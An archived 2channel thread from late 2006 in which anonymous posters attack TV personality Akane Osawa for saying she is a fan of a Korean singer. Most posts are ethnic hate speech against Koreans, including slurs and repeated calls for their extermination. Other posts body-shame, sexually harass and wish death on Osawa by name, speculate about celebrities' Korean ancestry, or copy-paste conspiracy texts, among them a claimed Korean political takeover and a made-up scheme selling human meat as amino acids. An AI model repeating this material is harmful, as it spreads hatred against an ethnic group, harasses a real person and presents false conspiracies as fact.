2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

 大沢あかねは自衛隊の敵 

1 :専守防衛さん:2006/11/01(水) 22:04:23
今日の「はなまるマーケット」で、
「私、ピのファンです。」って言ってやがった。
韓国人のファンなんて非国民だろ!


2 :専守防衛さん:2006/11/01(水) 22:05:10

許せん!

大沢親分は孫の教育もマトモに出来ないのか!!



3 :専守防衛さん:2006/11/01(水) 22:08:16
韓国男>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>日本男

4 :専守防衛さん:2006/11/01(水) 22:25:57
人を楽しませようとするところもなく
売り込むだけの女

不愉快にさせる女はいなくなれ

5 :専守防衛さん:2006/11/01(水) 22:55:21
いいんじゃネ!どうせ、バカなんだから?ほっとけよあんなの(^ .^)y-~~~

6 :専守防衛さん:2006/11/01(水) 23:02:25
馬鹿を相手に敵意丸出し自衛隊


…しょぼっ

7 :専守防衛さん:2006/11/02(木) 02:01:58
一発やりてぇなアイツと

8 :専守防衛さん:2006/11/02(木) 02:11:19
8ンツ

9 :専守防衛さん:2006/11/02(木) 02:14:06
9文

10 :専守防衛さん:2006/11/02(木) 02:37:53

でも・・・やはり、コレはマズイだろ・・・
http://8809.teacup.com/prettyangels/bbs



11 :専守防衛さん:2006/11/02(木) 03:18:50
エロぶんPM

12 :専守防衛さん:2006/11/02(木) 03:19:23
12支

13 :専守防衛さん:2006/11/02(木) 03:20:22
13日の金曜日

14 :専守防衛さん:2006/11/02(木) 12:21:12
大沢親分自体が張本勲と番組やってるよな。
大沢親分と張本に「喝!」

15 :専守防衛さん:2006/11/02(木) 12:34:37
わざと間違えるの、やめてくれ

16 :専守防衛さん:2006/11/02(木) 12:46:55
16文キック

17 :専守防衛さん:2006/11/02(木) 21:32:46
・・・ボクシング

18 :専守防衛さん:2006/11/02(木) 22:33:10

大沢あかねもチョンの工作員だったんでしょうか?
大沢親分もチョンの工作員なんでしょうか?



19 :専守防衛さん:2006/11/02(木) 22:41:44
大沢あかねと射撃したい!

20 :専守防衛さん:2006/11/02(木) 23:21:06

チョンは皆殺しに!!


21 :専守防衛さん:2006/11/03(金) 01:32:12

引っ込め
アゴデブ



22 :専守防衛さん:2006/11/03(金) 04:24:48
朝からあの態度でどの番組にも臨まれたら
うざったくて仕方がない!

23 :専守防衛さん:2006/11/03(金) 18:00:50

韓国人を好きな人にロクな人はいないよ。


24 :専守防衛さん:2006/11/03(金) 18:40:25
デブス 死ね

25 :専守防衛さん:2006/11/03(金) 18:41:26

チョンを好きなんて狂ってる。
死ね!!!


26 :専守防衛さん:2006/11/03(金) 20:40:54
あびる優もチョンか?
http://www.youtube.com/watch?v=L5-mYUsGaJc


27 :専守防衛さん:2006/11/03(金) 20:48:35
朝鮮ちん 朝鮮ちん パカするな  冷や飯食っても 温い糞たれる

28 :専守防衛さん:2006/11/03(金) 22:39:17
きもちわりーよ

思いもかけぬことをいえば視聴者が笑うと思ってんのか
きめーよ

29 :専守防衛さん:2006/11/03(金) 23:15:53

朝鮮人

捏造だって

得意だよ



30 :専守防衛さん:2006/11/04(土) 08:26:26

過去も捏造するんだもんな
たまんないよな


女児に売れてたのは10年近くも前で
男には全然興味も持たれてなかった

当時から顔が顔だからなwww

31 :専守防衛さん:2006/11/04(土) 09:18:13

チョンは絶滅しろ!!


32 :専守防衛さん:2006/11/04(土) 12:03:00
血縁関係をたどるとマジでチョンらしいね。
時代が時代だけに


きたねっ

33 :専守防衛さん:2006/11/04(土) 13:24:14
大沢あかね・・どーでもいいけど可愛くないよ!

34 :専守防衛さん:2006/11/04(土) 18:16:13
  |∧_,,∧   / ̄ ̄ ̄ ̄ ̄ ̄
  | #`Д´> < 独島は韓国の
  |⊃._,,∧∩ |  領土ニダ〜!
  | #`Д´>ノ<   ニダ〜!  
  |   ノ   \______
  |U U


  |
  |
  |彡 サッ       ∧_∧  / ̄ ̄ ̄ ̄ ̄
  |           (・∀・ )< 国際法廷・・・
  |  サッ       (    ) \_____
  |彡          |  |  |
  |           (__(__)



35 :専守防衛さん:2006/11/04(土) 19:25:13
  ∩∩  日 本 の 治 安 は俺 た ち に 任 せ ろ !    V∩
  (7ヌ)                 ∧∧          (/ /
 / /                 /支 \            ||
/ /  ∧_∧     ∧_∧   (`ハ´  )  .∧ ∧   ||∧_∧
\ \( ´∀`)―--< `∀´ > ̄      ⌒ヽ(´∀`)=) // ( ´∀`)∩
  \       /⌒   ⌒ ̄ヽ 中国人/~⌒    ⌒ /  /    ( )
   | マスゴミ  |ー、韓国人  / ̄|    //`i      /  / \\∧_ノ
    |匿名  | |     / (ミ   ミ)  | 在日 | /ノービザ .\
   |報道 | |     | /      \ |    |/ 北側 |(_)
   |    |  )    /   /\   \|       ヽ  /\ \
   /   ノ | /  ヽ ヽ、_/)  (\    ) ゝ  | /   \ |
   |  |  | /   /|   / レ   \`ー ' |  |  / /     | |


36 :専守防衛さん:2006/11/05(日) 10:58:36

態度がやたらとデカかったり、トラブルメーカーは、
大抵チョンだと思う。
チョンがいなくなれば、ほとんどの事件や揉め事はなくなると思う。





37 :専守防衛さん:2006/11/05(日) 20:44:55
                        ,,,,,     *         。  o
   o    m         ★―――(っll)\     ,,,,,,,__
       )| |   ,,,,,,,,, _            \\   (mn)_  ヽ   *
  +    ( _l   [|,,★,,|,]    nm       〉 .〉 ∧国∧ 7 /     。 ゚
       \ \_<■ε■> / ノ ∧酋∧ / ./  <´潘`*.>/ /   。
 。   *    \_ ̄_ ̄  )/ / <‘∀‘* > / (~⌒\   ト/ )        *
          / ̄ \ /ヽ  ̄ ̄    ~ /   \\ \/ /     ・
      ,⊂二二/〉   /    ̄ ̄|    イ     \\_,/|    +    *
            /   /      ヽ     |      ,)    ノ
  。゚        (  <./         \    \/⌒\   ノ、      *  。
           /\  \          〉     /\  \ γヽ     。   +
             核 で 開 く 僕 ら の 未 来


38 :専守防衛さん:2006/11/05(日) 20:48:05
あかねたんは、おはスタで小学生のキッズと同レベルで争うことができます。
o(^-^)o

39 :専守防衛さん:2006/11/06(月) 05:36:00
デブス

40 :専守防衛さん:2006/11/06(月) 19:08:28

ハングルなんて、そもそも「訓民正音」という
漢語・漢文が使えない「愚民」のために李朝四代世宗王によって
作られた文字で、「無職の文字」「婦女子の文字」と蔑まれて
いた文字なんです。



41 :専守防衛さん:2006/11/06(月) 19:16:55
こっちはジーコ
こっちはフィーゴ
じゃ〜こっちは?
ベッケンバウワ〜♪

42 :専守防衛さん:2006/11/06(月) 19:49:26
>>41

http://www.youtube.com/watch?v=v7kqisHNlpw


43 :専守防衛さん:2006/11/07(火) 16:30:15
>>41
かなり不愉快なんですが。

44 :専守防衛さん:2006/11/07(火) 16:36:10
>>41 踊るさんま御殿

45 :専守防衛さん:2006/11/07(火) 22:15:49

日本に輸出するキムチにタン唾を入れるチョンのババア
http://plaza.rakuten.co.jp/tinkorosuke/diary/200508010001/


46 :専守防衛さん:2006/11/08(水) 07:34:27
 ゚     。  :     ..:| |l糞|  ゜ ゜
:         。    ..:| |lキ|   :   。
    ゜     : ..:| |lム|.. ゜自衛隊は韓国が起源ニダ〜!
  :       ゚   ..:| |lチ|::;;,, :   ゚ 
    ゚   :     ..:|;:;:.... |⌒ヽ  ゜ :  ゜
      ゜  :  ..:|;:;:.... |`∀´>   ゜    
  。           ゚ ..:|;:;:.... |   | :   : 
   :     :   ..:|;:;:.... |  .|  ゚     
 ゚  。  :   :  ..:|;:;:.... |  j.:.:.....
  :      :   ..:|;:;:.... |_,,ノ...::::;:;:;
      ,,.,、-‐''"´~ `ー-‐':::::;:;:;:;:;:;:;:;:::.



47 :専守防衛さん:2006/11/08(水) 12:03:28
大沢きもちわりぃぃぃぃ〜〜〜〜〜〜〜〜〜〜〜〜

48 :専守防衛さん:2006/11/08(水) 18:24:28

チョンが好きなやつは自衛隊の敵です。


49 :専守防衛さん:2006/11/08(水) 18:32:06
敵ながらあっぱれじゃ!
―糸冬―

50 :専守防衛さん:2006/11/08(水) 18:52:35
大沢あかねのあそこはやはり、ベッケンバウアーなのであろう

51 :専守防衛さん:2006/11/08(水) 19:42:30
それがおもしろいとは。
お前はめでたいな

52 :専守防衛さん:2006/11/10(金) 17:07:57
尻軽女

53 :右翼派:2006/11/10(金) 17:27:28
ああっ、資本主義者がこんなにたくさん!

54 :専守防衛さん:2006/11/11(土) 16:50:46

韓国人は、反日のくせにカネのためなら日本に来たがる。

まったく許せない連中だ。



55 :専守防衛さん:2006/11/11(土) 18:58:48
っと、在日朝鮮人の>>54がおっしゃっています。
アイゴー!
自作自演とはいえ同胞の悪口をいてしまったニダ・・・。
これも全部チョッパリどものせいニダ!

               :∧_∧: シクシク
             f :<、   ヽo:
       =(・∀・)[R] :(_,,ィ、__つつ:
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

56 :専守防衛さん:2006/11/11(土) 22:33:03
日テレ 対馬住民困惑「韓国人お断り」も 迷惑行為の実態
http://www.youtube.com/watch?v=t6oPJDW3ECs
逆切れ韓国人


57 :専守防衛さん:2006/11/12(日) 23:27:29
チョンタレきもい〜

58 :専守防衛さん:2006/11/13(月) 18:08:02

:::::: 台湾人と韓国人の民族性の違い :::::::

昔、本田技研の創業者・本田宗一郎氏が台湾と韓国へ技術支援に行った。
技術を伝えて、しばらくすると台湾から、
「日本と同じものが作れるようになりました。是非見に来てください!」
と連絡が入った。 台湾人は腕を上げたことを先生の本田氏に報告した。

そしてまたしばらくして韓国からも連絡があった。
「日本と同じものが作れるようになりました。もう来なくていいです。」
そして韓国は本田とのライセンス契約を一方的に解消し、エンジンから
デザインまで全くのコピー品を“韓国ブランド”として販売し始めた。

つまり技術を盗み終わったら先生は「用済み」だと言い、しかも技術提供の
代価であるライセンス料は払いたくないというのが韓国の言い分である。
 本田宗一郎氏は大変失望して、「韓国とは絶対に関わるな」と漏らした。
この話は『夢を力に ―私の履歴書』という本田氏の自伝にある。
『併合で散々援助されたのに、身勝手な独立をした韓国』という
韓国民族とは、そういう人達である。

韓国なんかと関わるとロクなことはない。


59 :専守防衛さん:2006/11/14(火) 03:50:29
大沢あかね拉致するニダ喜び組で鍛えるニダ

60 :専守防衛さん:2006/11/15(水) 19:06:36

チョンが絶滅したら、
世の中も平和になるだろうな〜。



61 :専守防衛さん:2006/11/16(木) 18:33:57
くさっ!!!



62 :専守防衛さん:2006/11/16(木) 19:39:38
┏━━━━━┓
┃62ゲット┃
┗━━━━━┛


63 :専守防衛さん:2006/11/17(金) 20:48:13
   /⌒⌒⌒⌒⌒⌒ ))
  (   从    ノ.ノ
   ( ./  ̄ ̄ ̄ ̄\
   |::::::  ヽ  ...  ...丶.
   |::::._____ __)     ) /<ミサイルを撃っても日本は怒らないスミダー!
  (∂: ̄ ̄| ̄・` |=|・ ̄ |   ( (   脅せば思い通りになるニダ〜!
   (  (   ̄ )・・( ̄ i n.n  )ノ  ______
   ヘ\   .._. )C( ._丿.=|_|=・.  │  | \__\___
 /  \ヽ _二__.ノ  <つ(.(rヽ    |  |   |= |iiiiiiiiiii|
/⌒ヽ.   \__/\i/\ ヽ .( .ノ     |  |   | =. |iiiiiiiiiii|
|   ヽ ____\o\./  |.      |  |   |三 |_「r.、
|   //     // ̄.\ \二|    |_..|_/(  ) ̄ ))
ヽ ______//r_/| |.||⌒ヽ〜〔 ̄ ̄! ̄ ̄ ̄/ ̄ ̄\((



64 :専守防衛さん:2006/11/17(金) 23:03:28
             //
           ///)      __ -──‐-、,.._
          /,.=゙''"/      i:::::::;;;;;;;;;;;;;;;;;;;;;;;;::::::::ヽ
         i f ,.r='"-‐'つ   /:::::::|  -─-    |::::::ヽ
         /   _,.-‐'゙~    |::::::/ ,-‐ Ll ‐-、 ヾ::::::l
        ,i    ,二ニー;    ヽ;;/,fエ:エ  fエ:エ、 ヽ;;/
        ノ    il゙ ̄ ̄     (((  . / \    )))
      ,イ「ト、  ,!,!         ヽiヽ ノ(、__,ノヽ  /i_/
     / iトヾヽ_/ィ"___.     \ < ー=‐ >ノ /
    r;  !\ヽi._jl/゙_ブ,フヽヾーtー:、__ ,トf-≦-=、_,L
    ∧l   \゙7'゙ .j!/ / /\jr=ニ:ー-゙┴、 ゙ミ三ヽi]l「/l      _____
   ./ i !   \.// /./  ./   \ ┌‐ヽミ≦‐十'"!    r",.-、, \
  /  i゙i     /  ̄ ̄ ̄       i .l ッー-、\_ミ「彡゙'ー=‐ (_.人 ヽ._ ヽ
 ノ   ヾ、  /            i! ! \_ ̄i i l r‐へ.__ ゝ. \   /
/      ゙''y'              l .i  、 l  !.j .l l 「,> (  \   人

立てよ国民!今こそ我ら大韓民国は日本に対し、宣戦を布告するものである!

65 :専守防衛さん:2006/11/17(金) 23:03:55

埼玉・川越の女性絞殺、住居侵入容疑で隣室の男を逮捕
 埼玉県川越市諏訪町のアパート2階自室で無職池田英子さん(57)
が絞殺された事件で、川越署は17日、池田さん方ベランダで目撃
された隣室の無職金津伸敏容疑者(47)を住居侵入容疑で逮捕した。
 同署は、殺人についても何らかの事情を知っているとみて追及しているが、
金津容疑者は「今は何も言えない」と話しているという。
 調べによると、16日午後5時55分ごろ、池田さんの「助けて」という
悲鳴を聞いた近所の人が、ベランダに金津容疑者がいるのを目撃した。
(2006年11月17日12時11分 読売新聞)


66 :専守防衛さん:2006/11/18(土) 22:55:57
      _____
     /       \
    /          \
   / /@W∧WーVV  \    _______
  /  /┌─┐ ┌─┐V│  /
  | C/'┤¬├-.┤ー├)ミ < 誰かあかねを呼んだ?
  ミ |U└─( 。。 )─┘|V   \_______
 (X)| ∴     ∴ /(X)
 (X)\    3    丿(X)____
(X)   ー────'   |  | ̄ ̄\ \
   /   \/ \__|  |    | ̄ ̄|
  /  \___      |   |    |__|
  | \      |つ   |_ _|__/ /
  /     ̄ ̄  | ̄ ̄ ̄ ̄|  〔 ̄ ̄〕
 |       | ̄



67 :専守防衛さん:2006/11/19(日) 10:11:11

日テレ 対馬住民困惑「韓国人お断り」も 迷惑行為の実態
http://www.youtube.com/watch?v=t6oPJDW3ECs
チョンって、和田アキコみたいなのばっかだな。


68 :専守防衛さん:2006/11/19(日) 21:41:57

06/09/25 たけしのTVタックル 反日映画の裏側
http://www.youtube.com/watch?v=xGlJv0LKVrA

クソチョンとクソチャンコロにはもうウンザリだ。


69 :専守防衛さん:2006/11/20(月) 14:27:08
                 /:::::::::::::::::::::::::::::::::::::::::::`丶、
                /::::::::::::::::::::::::::::::::::::::::::::::::::::::::.、
                 |::::::::::i'"゛゙゛゙゛゙゛゙゛゙゛゙゛゙゛゙゛゙゛`ヽ;:i
                 |:::::::::::|     中共     |:|
                |::::::::::::|     ー  | | 一   |l
                \,-、/.  ┏━━┓┏━━┓
                 (< ¨¨¨¨¨|    |.¨|    |
                   ∨     `ー─‐'(. ) ──‐'
                  |     / ____ ヽ |
      ,..--‐‐‐‐‐‐‐‐---..  |         丶-----'   |
    /::::ヽ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;) ゝ        ⌒    ノ
    |::::::::::/   小沢民 ヽヽ `┬― ''´,.''"┬ -一 '
    .|::::::::::ヽ ........    ..... |:|  /    ,、    \
    |::::::::/     )  (.  .|  | ,     \   ヽ
   i⌒ヽ;;|.  -===‐  .‐==-.|  | ー       ヽ ヽ 〕
   .(     'ー-‐'  ヽ. ー' |  .| ⌒      /   ノ
   ヽ.      /(_,、_,)ヽ  |  .|        ./  /
    |.    /        |  .|     ⊂⌒ /
    |ヽ      ;;ノ^,^──-彡彡  / , , / ヽ
   /ヽヽ   ) uヽ `ー── 彡  //ィ.,ソ l ))
  /    \ヽヽ   u`~´U   (;;(;;;;)      /
         `ー-- U‐‐' ングッ  |       |
                 ングッ


70 :専守防衛さん:2006/11/20(月) 16:26:44
きもい

コネアゴきもい〜



71 :専守防衛さん:2006/11/23(木) 17:23:30
チョンくさっ!!

72 :専守防衛さん:2006/11/24(金) 02:33:11
民主党は“全て中国の言う通り”がモットー。
公明党は創価学会とともに日本を朝鮮のものにしようとしてる。
創価学会は日本の大手メディアを間接支配していて、 社民党は朝鮮総連とともに拉致の存在を否定し、被害者の活動を妨害した。
共産党は北朝鮮に関して社民党と同じ。それに加えて反自衛隊・反米である。
朝鮮総連と民潭は日本を解体して朝鮮にしようと参政権を狙っているし、
統一教会は売国政党の社民党を支援している。
☆朝日新聞などは中国と朝鮮の代弁者、つまり日本最大手の売国新聞だし、
日教組は基本理念のレベルから反資本主義・反体制であり、残る自民党にも中国の顔色ばかり窺っている者が潜んでいるのである。
今後は『人権擁護法案』成立を契機に公明党は民主党に鞍替えして連立し、 実質外国人与党が誕生して第二期工作の完結となるのが彼らの筋書きである。 (今、実際にそのように動きつつある)
そうすればあっという間に外国人参政権を成立させて日本の国政は全て
朝鮮人が牛耳り、朝鮮に歯向かう日本人の政治介入する隙間を残さない
新たな制度が完成することだろう。
そしてこれらの売国組織に必ず関与し、彼らの侵略行為の結果において
最も利益を享受する立場にあるのが『在日朝鮮人』である。
http://hisazin-up.dyndns.org/up/src/14540.wmv 在日特権の真相にせまる21.68MiB

73 :専守防衛さん:2006/11/24(金) 18:39:36

http://up.spawn.jp/file/up53456.jpg
安田成美整形前の顔アップできたよ。
当時MCシスターという雑誌でモデルをしていた当時の顔。
見事にチョン顔です。


74 :専守防衛さん:2006/11/24(金) 22:09:09
チョンくさっ!!

75 :専守防衛さん:2006/11/24(金) 23:47:04

ねえ、最近、在日チョン芸能人や在日だっていう噂の芸能人が
立て続けて結婚しているようだけど、
チョンが何かを企んでるの?
注意したほうがよくない?

木村祐一、吉岡美穂、ミムラ、井川遥、・・・。



76 :専守防衛さん:2006/11/26(日) 20:51:07
【ひろゆき】2ch、年内にも閉鎖へ【自己破産】
2chにおける名誉毀損などの書き込みを削除する作業を怠った為に、
全国から提訴されているが、数億円の慰謝料支払いの為、自己破産するとのこと。

〜詳細は以下のページで確認しる!〜

http://pc8.2ch.net/test/read.cgi/pcnews/1159973168/l50

77 :専守防衛さん:2006/11/29(水) 03:11:05
奇形児

78 :専守防衛さん:2006/11/30(木) 22:40:27

本当にチョンは死んでいいと思う。
まじで日本に来ないでくれ。

ニュース見てて、小型船と重油タンカーの衝動事故があった。
日本の海苔の被害甚大とか放送されていたが、一瞬画面に映った重油タンカーには韓国語が書かれていて、明らかに韓国籍の船なのにニュースが国籍を発表しないこと、事故の原因を発表しないことにキナ臭さを感じた。


79 :専守防衛さん:2006/12/01(金) 20:36:58
この変態ストーカー女め


80 :専守防衛さん:2006/12/01(金) 21:01:08
井川遥ニダ〜!
http://vista.jeez.jp/img/vi6489108381.jpg



81 :専守防衛さん:2006/12/02(土) 23:45:12

:::::: 台湾人と韓国人の民族性の違い :::::::

昔、本田技研の創業者・本田宗一郎氏が台湾と韓国へ技術支援に行った。
技術を伝えて、しばらくすると台湾から、
「日本と同じものが作れるようになりました。是非見に来てください!」
と連絡が入った。 台湾人は腕を上げたことを先生の本田氏に報告した。

そしてまたしばらくして韓国からも連絡があった。
「日本と同じものが作れるようになりました。もう来なくていいです。」
そして韓国は本田とのライセンス契約を一方的に解消し、エンジンから
デザインまで全くのコピー品を“韓国ブランド”として販売し始めた。

つまり技術を盗み終わったら先生は「用済み」だと言い、しかも技術提供の
代価であるライセンス料は払いたくないというのが韓国の言い分である。
 本田宗一郎氏は大変失望して、「韓国とは絶対に関わるな」と漏らした。
この話は『夢を力に ―私の履歴書』という本田氏の自伝にある。
『併合で散々援助されたのに、身勝手な独立をした韓国』という
韓国民族とは、そういう人達である。

韓国なんかと関わるとロクなことはない。



82 :専守防衛さん:2006/12/02(土) 23:55:34
飯の種に人をバカにする女は
氏ねばいいのに



83 :専守防衛さん:2006/12/02(土) 23:56:28
おはスタ見てるけど、キッズたちの方がレベルが高いな。
つきあうならキッズとつきあいたい。

84 :専守防衛さん:2006/12/03(日) 11:54:56
文鮮明の「み言葉集」二百万円” ”「天運石」百数十万円” 統一協会を脱会した元女性会員ら 被害の実態を語る(09/17)

統一協会の被害救済に当たっている全国霊感商法対策弁護士連絡会は十六日、
東京で全国集会を開催。集団結婚を経験した元統一協会員らが内部の実態や脱会への経過を語り、
「家族の愛情で救われた」と証言しました。

一九九五年の集団結婚に参加し、韓国人と「結婚」した女性。
在韓日本人女性の半数ともいわれる統一協会員の実情を語りました。言葉の壁や貧困。

「手紙を書いても切手代がなく、流産や病気でも保険がない。自分の精神状態を保つのに精いっぱいの人が大勢いる」。

高齢の祖母に子どもを見せに帰国した九九年、教えの誤りを知って脱会。
その後も集団結婚の相手への思いを乗り越える苦しみが続きました。

「どんなに不器用でも私を見放さず、私の居場所を確保しつづけてくれた家族がいたからこそ救われることができた」と述べ、
集会参加の会員家族に「絶対に見捨てないで」と訴えました。

弁連東京事務局長の渡辺博弁護士が、二百万円の文鮮明「み言葉集」や悪霊を封じるとして
百数十万円で「天運石」を買わせるなど日本での資金集めと、
その金で韓国のリゾート地を買いあさるという統一協会の実態を告発しました。

集会には弁護士、宗教者、市民ら二百人が参加し、菅原伸郎東京医療保健大学教授と松岡秀明淑徳大教授が講演。
全国統一協会被害者家族の会が編集した『自立への苦闘』(教文館)が紹介されました。

ソース:しんぶん赤旗
ttp://www.jcp.or.jp/akahata/aik4/2005-09-17/2005091714_01_2.html

在韓日本人女性の半数ともいわれる統一協会員の実情を語りました。
「手紙を書いても切手代がなく、流産や病気でも保険がない。自分の精神状態を保つのに精いっぱいの人が大勢いる」。

85 :専守防衛さん:2006/12/03(日) 12:08:46
←こっちはジーコ
→こっちはフィーゴ
じゃ↓こっちは?









ベッケンバウアー♪ベッケンバウアー♪ベッケンバウアー♪

86 :専守防衛さん:2006/12/03(日) 12:11:07
>>1
全くだ!!なんてこった。
君の言う通りだ。

87 :専守防衛さん:2006/12/03(日) 16:13:24
今日のたかじん委員会では、意外と日本女性の良さを持った人だと感じた。
今日からはファンになりました。

88 :専守防衛さん:2006/12/03(日) 21:14:20
民主党は“全て中国の言う通り”がモットー。
公明党は創価学会とともに日本を朝鮮のものにしようとしてる。
創価学会は日本の大手メディアを間接支配していて、 社民党は朝鮮総連とともに拉致の存在を否定し、被害者の活動を妨害した。
共産党は北朝鮮に関して社民党と同じ。それに加えて反自衛隊・反米である。
朝鮮総連と民潭は日本を解体して朝鮮にしようと参政権を狙っているし、
統一教会は売国政党の社民党を支援している。
☆朝日新聞などは中国と朝鮮の代弁者、つまり日本最大手の売国新聞だし、
日教組は基本理念のレベルから反資本主義・反体制であり、残る自民党にも中国の顔色ばかり窺っている者が潜んでいるのである。
今後は『人権擁護法案』成立を契機に公明党は民主党に鞍替えして連立し、 実質外国人与党が誕生して第二期工作の完結となるのが彼らの筋書きである。 (今、実際にそのように動きつつある)
そうすればあっという間に外国人参政権を成立させて日本の国政は全て
朝鮮人が牛耳り、朝鮮に歯向かう日本人の政治介入する隙間を残さない
新たな制度が完成することだろう。
そしてこれらの売国組織に必ず関与し、彼らの侵略行為の結果において
最も利益を享受する立場にあるのが『在日朝鮮人』である。
http://hisazin-up.dyndns.org/up/src/14540.wmv 在日特権の真相にせまる21.68MiB

89 :専守防衛さん:2006/12/07(木) 10:14:19

ウリナラマンセーの歌
http://www.geocities.co.jp/Playtown-Darts/3036/uri.html

チョン死ね!


90 :専守防衛さん:2006/12/08(金) 02:25:30
事務所がゴリ押しして
出演させるのはチョンだから。



性格ブス消えろ!!

91 :専守防衛さん:2006/12/08(金) 15:11:52
自衛隊の敵というか日本人の敵だろう。もし本当だったらな。

92 :専守防衛さん:2006/12/08(金) 20:36:56
日本の敵。

93 :専守防衛さん:2006/12/08(金) 21:02:46
>>88 解ってねーな。マスコミを支配してるのは、電通様だ。
悪いね庶民ヲタ

94 :専守防衛さん:2006/12/08(金) 21:24:32
こいつ本番中になにやってんの?

95 :専守防衛さん:2006/12/08(金) 21:28:51
日本に輸出するキムチにタン唾を入れるチョンのババア
http://plaza.rakuten.co.jp/tinkorosuke/diary/200508010001/


96 :専守防衛さん:2006/12/08(金) 21:31:39
ねずみのチン○のジェプJapan is our toilet!!「日本は我々のトイレ」...ファック!
ポッキンネイション(※8) チャパニセ(※9) ポッキンネイション(繰り返し×2)
おい、敗戦国(※10)(ハイ)美しい我々のアガシ(※11)の足の前で数百名
並んで待って待って待っっていた障害者たち(障害者、障害者、障害者たち)
ジャパニーズガール達、ホントに不味いねー貰っても食えない繕った出来損ない
ダーティーコリアンプッシー達も、お前達は食わない!チン○が小さくて食わないよ
俺は百済。俺達宗主国。俺はニッポンの宗主国
未開だったお前らにしてあげたこと覚えてるか?記憶してるか(記憶してるか?)七支刀...七支刀
お前らの宝物、俺がやった下賜品。御使して挨拶しな(ハイ)前で跪け(ハイ)
使えて挨拶しな(ハイ)永遠に従え(ハイ)泣きながら祈れ(ハイ) Z ARROW A.P.A.M.U
ポッキンネイション チャパニセ ポッキンネイション(繰り返し×2)
ジャップ!沈み行くお前の国、怖くて、美しく小さな我々の島、独島(※12)に独島に...
全国民、お手手つないで来たいのか?(ハイ)
ジャップ!街にゃすっかり核をくらった爆弾たち広島bomb!長崎bomb!東京bomb!ジャパンbomb!
ボン!ボン!ボン....
核落としてやるからな!核落としてやるからな!

おい!お前、マルタ知ってるか?習わなかったろ?障害者達、お前ら馬鹿なんだから
北朝鮮は元々我々の国。韓国も先に立ってお前らじゃップ、使えなく小便教えてやる
コップ食え(ハイ)もうこの小便も食え(ハイ)良いのか!良いね。目茶良いって障害者達は、てんかんやってろ!
野蛮なジャップ、てんかんみたいなjapanese
ポッキンネイション チャパニセ ポッキンネイション(繰り返し×4)

97 :専守防衛さん:2006/12/08(金) 21:31:57
コラ!あかね!ヤらせろ!

98 :専守防衛さん:2006/12/09(土) 14:03:54
大沢あかねよりあーりんの方がかわいい!!

99 :専守防衛さん:2006/12/11(月) 03:05:41
【アミノ酸点滴液やアミノ酸調味料などは人肉由来である可能性の方が高い:死者への尊厳は?】
http://life7.2ch.net/test/read.cgi/psy/1162598313/640-661

このまま人肉流通が世界全体で拡大すると、巨額の裏金捻出を原動力に水面下の
秋田県で続いている異様な人喰い殺人集団犯罪状況が全国拡大しかねない事を危惧します。
http://society3.2ch.net/test/read.cgi/giin/1160835645/137-157

赤ん坊、子供まで殺害対象に加え営利を主目的とした自然死・事故死・自殺・拉致偽装した組織的な《年に数万人》大量殺人
(県庁、病院、県警、自衛隊災害派遣、林業業者等が被疑者)および「本当の意味での自然死」した遺体
            ↓ 
日本国内の葬儀社・病院での遺体解体(臓器摘出、ワイン製造用血液採取、ヒト成長ホルモン採取)および
「北朝鮮、韓国、インドネシア、台湾、中国からのぶつ切り人間死体の不正輸入」 → 他の動物名(鯨、馬、犬、牛、豚)で人肉を食肉(生肉)として販売。
  ↓                  ↓                                ↓                ↓
臓器&HGH等摘出      ミンチに加工 → ソーセージ等              外食産業(焼肉屋等)     一部は冷凍食品として販売  
                     ↓
    大型の塩酸タンクに投入し加熱(塩酸加水分解)
      ↓              ↓
   上澄みの油部分      分解されたアミノ酸 
      ↓              ↓
石鹸、飼料、調理油、乳剤   NaOHで中和  →  アミノ酸肥料  → 「環境に優しい」有機農業キャンペーン                     ↓
                     ↓
                  HPLCで分画
                     ↓
アミノ酸点滴液、アミノ酸調味料(即席ラーメン等)、アミノ酸化粧品、アミノ酸飲料、アミノ酸健康食品

*「死者の尊厳」がないに等しい社会では「生命の尊厳」もなくなり国家や精神文明が崩壊しかねない。

100 :専守防衛さん:2006/12/11(月) 07:36:57
           アンニョハセヨ〜
             ∧_∧   ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            <丶`∀´>  <丶`∀´><まずは対馬に移住するニダ
       ∧∧  (┌斤Y斤⊃⊂   つ  \__________
       <`∀´> / / .| | ヽ  人  Y
     〜(,,_ ) └-レ─レ─ゝレ (_フ
      ハセヨ〜 ニダ〜    スミダ〜!



101 :専守防衛さん:2006/12/12(火) 00:06:22
毎日見てると、あかねでもいいやって気分になってくる・・・
でも、その後のおはスタライブに出てくるおはガールのまりあの方が遥かに美人だね。
まだ中学生なのに・・・

102 :専守防衛さん:2006/12/12(火) 05:35:52
自衛隊レニレ£ァ〜
女σ隊員±ωм○居ゑωτ〃£Йё?
τ〃м○〜、
訓練`⊂ヵゝτ〃…
足ヵゞ臭<TょッちゃぅωT=〃Йё〜★

ヵゝゎレヽξぅ★

103 :専守防衛さん:2006/12/12(火) 18:02:25
お爺様とは血は繋がってないらしいですよ

104 :専守防衛さん:2006/12/12(火) 23:14:04
大沢あかね、マンセーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
